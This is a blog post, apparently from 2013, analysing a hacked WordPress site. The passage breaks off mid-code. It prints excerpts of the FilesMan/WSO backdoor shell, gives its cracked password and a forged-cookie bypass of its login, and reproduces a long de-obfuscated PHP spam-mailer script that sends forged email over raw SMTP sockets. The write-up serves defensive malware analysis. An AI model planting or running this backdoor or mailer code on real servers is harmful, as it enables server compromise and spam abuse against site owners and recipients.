Insight into a Spam Network

Monday, 15 July 2013

Insight into a Spam Network

While browsing around the net I often run into websites that have been compromised. I recently discovered a website that was hosting the filesman backdoor, redirecting users to malicious sites, and allowing spammers to send mail from the web server. I thought it might be fun to take a look around and see if I could find anything interesting.

Identifying the infected site

The website that I investigated was running a WordPress blog. Directory indexing was enabled on the website and it was possible to see the contents of the uploads directory.

Anytime you see a php script in the uploads directory of a WordPress site it is probably a bad sign. Clicking on the info.php file loads a page that requests a password to log in. This was definitely a good indicator that the site was hosting a backdoor shell.
Another interesting thing in the uploads directory was the toolbox.zip file. I downloaded the zip found and at first glance it appeared to be a free WordPress theme. Further inspection of the contents led me to a copy of the info.php file that was requesting the password.

The filesman backdoor

Looking through the source of the info.php file you can clearly see that it is a backdoor. The script tries to avoid getting indexed by crawlers and contains an MD5 hash of the password required to gain access.

<?php

$auth_pass = "866fd58d77526c1bda8771b5b21d5b11";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {

header('HTTP/1.0 404 Not Found');

exit;

}

/* Removed some code here */

function wsoLogin() {

die("<pre align=center><form method=post>Pass: <input type=password name=pass><input type=submit value='>>'></form></pre> © Access denied! :)");

}

function WSOsetcookie($k, $v) {

$_COOKIE[$k] = $v;

setcookie($k, $v);

}

if(!empty($auth_pass)) {

if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))

WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))

wsoLogin();

}

/* The rest of the code has been removed */

Bypassing the shell password protection

I was able to google for the hash value to determine that the plaintext password was ‘nhzgrf’. What I find amusing is that you can completely bypass the authentication by creating your own cookie :D
Take a look at the line that generates the cookie value

1 2	if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

It creates a cookie where the name is the MD5 value of $_SERVER['HTTP_HOST'] and the value is the password hash. So if the name of the website was example.com our cookie would look like this:
5ababd603b22780302dd8d83498e5172=866fd58d77526c1bda8771b5b21d5b11
Nice try on the authentication! Maybe next time you should look at using the built in session management in PHP. Of course this required that I have access to the source of the shell to get the MD5 hash of the password.

Finding the spam script

Reviewing the Apache logs revealed a ton of requests for a functions.php file that is in the uploads directory. The requests were showing up on a regular basis from a number of different IP addresses. External addresses should not be making POST requests to any scripts in this directory!

1	213.57.145.11 - - [26/Apr/2013:23:54:18 +1000] "POST /wp-content/uploads/2013/functions.php HTTP/1.1" 200 2294

The script was obfuscated using a few simple techniques but nothing really fancy. After de-obfuscating the script and renaming most of the variables to something more meaningful it was easy to see what the script does.

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

<?php

// Be a little stealthy

@error_reporting(0);

@ini_set('error_log', NULL);

@ini_set('log_errors', 0);

// Check for the required post data

if (count($_POST) < 2) {

die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));

}

// Get the post data

$post_encoded = false;

foreach (array_keys($_POST) as $v3c6e0b8a) {

switch ($v3c6e0b8a[0]) {

case chr(108)://l

$post_l = $v3c6e0b8a;

break;

case chr(100)://d

$post_d = $v3c6e0b8a;

break;

case chr(109)://m

$post_m = $v3c6e0b8a;

break;

case chr(101);//e

// If this is set our post data has been encoded

$post_encoded = true;

break;

}

// Check for the 'l' and 'd' post variables

if ($post_l === '' || $post_d === '')

die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));

// Get a list of the disabled PHP functions

$disabled_functions = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));

$post_l_value = @$_POST[$post_l];

$post_d = @$_POST[$post_d];

$post_m = @$_POST[$post_m];

// Deal with the encoded post data if we have to

if ($post_encoded) {

$post_l_value = decode_post_value($post_l_value);

$post_d = decode_post_value($post_d);

$post_m = decode_post_value($post_m);

}

// URL decode the data

$post_l_value = urldecode(stripslashes($post_l_value));

$post_d = urldecode(stripslashes($post_d));

$post_m = urldecode(stripslashes($post_m));

// Check if we need to split data out from this format first;last;email@host.com

if (strpos($post_l_value, ';', 1) != false) {

list($first_name, $last_name, $to_emailAddr) = preg_split('/;/', strtolower($post_l_value));

$first_name = ucfirst($first_name);

$last_name = ucfirst($last_name);

$to_hostname = next(explode('@', $to_emailAddr));

if ($last_name == '' || $first_name == '') {

$last_name = $first_name = '';

$post_l_value = $to_emailAddr;

} else {

$post_l_value = "\”$first_name $last_name\” <$to_emailAddr>";

}

// If we didn't find any ';' then we only have an email address

} else {

$last_name = $first_name = '';

$to_emailAddr = strtolower($post_l_value);

$to_hostname = next(explode('@', $post_l_value));

}

// Parse out the data for the email to send

preg_match('|<USER>(.*)</USER>|imsU', $post_d, $from_user);

$from_user = $from_user[1];

preg_match('|<NAME>(.*)</NAME>|imsU', $post_d, $from_name);

$from_name = $from_name[1];

preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $post_d, $subject_line);

$subject_line = $subject_line[1];

preg_match('|<SBODY>(.*)</SBODY>|imsU', $post_d, $email_body);

$email_body = $email_body[1];

// Replace %R_NAME% and %R_LNAME% placeholders with first and last name

// in the subject line and the email body.

$subject_line = str_replace("%R_NAME%", $first_name, $subject_line);

$subject_line = str_replace("%R_LNAME%", $last_name, $subject_line);

$email_body = str_replace("%R_NAME%", $first_name, $email_body);

$email_body = str_replace("%R_LNAME%", $last_name, $email_body);

$from_hostname = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);

// This snippet of code doesn't appear to be needed

if (ne667da76($from_hostname) || @ini_get('safe_mode'))

$v10497e3f = false;

else

$v10497e3f = true;

// Build up the from email address.

$from_email = "$from_user@$from_hostname";

if ($from_name != '')

$from_email_formatted = "$from_name <$from_email>";

else

$from_email_formatted = $from_email;

// Create the email headers

$mail_headers_2 = "From: $from_email_formatted\r\n";

$mail_headers_2 .= "Reply-To: $from_email_formatted\r\n";

$mail_headers_3 = "X-Priority: 3 (Normal)\r\n";

$mail_headers_3 .= "MIME-Version: 1.0\r\n";

$mail_headers_3 .= "Content-Type: text/html; charset=\”iso-8859-1\”\r\n";

$mail_headers_3 .= "Content-Transfer-Encoding: 8bit\r\n";

$mail_headers_1 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $mail_headers_2;

$mail_headers_1 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$from_hostname>\r\n";

$mail_headers_1 .= "To: $post_l_value\r\n";

$mail_headers_1 .= "Subject: $subject_line\r\n";

$mail_headers_1 .= $mail_headers_3;

$mail_headers_body = $mail_headers_1 . "\r\n" . $email_body;

// Determine the mail server to use

if ($post_m == '')

$post_m = getMxHost($to_hostname);

// Send the email

if (($vb4a88417 = sendMail($from_email, $to_emailAddr, $mail_headers_body, $from_hostname, $post_m)) == 0) {

die(chr(79) . chr(75) . md5(1234567890) . "+1");

} else {

echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417";

}

// Checks if the input is formatted as an IP address but doesn't appear to be needed

function ne667da76($v957b527b)

{

return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);

}

// Sends the spam email

function sendMail($from_email_formatted, $to_email, $mail_headers_body, $from_hostname, $post_m)

{

// Work around disabled functions if possible

global $disabled_functions;

if (!in_array('fsockopen', $disabled_functions))

$fp_mail_stream = @fsockopen($post_m, 25, $errno, $errstr, 20);

elseif (!in_array('pfsockopen', $disabled_functions))

$fp_mail_stream = @pfsockopen($post_m, 25, $errno, $errstr, 20);

elseif (!in_array('stream_socket_client', $disabled_functions) && function_exists("stream_socket_client"))

$fp_mail_stream = @stream_socket_client("tcp://$post_m:25", $errno, $errstr, 20);

else

return -1;

if (!$fp_mail_stream) {

return 1;

} else {

// Send the spam mail

$post_d = getResponse($fp_mail_stream);

@fputs($fp_mail_stream, "EHLO $from_hostname\r\n");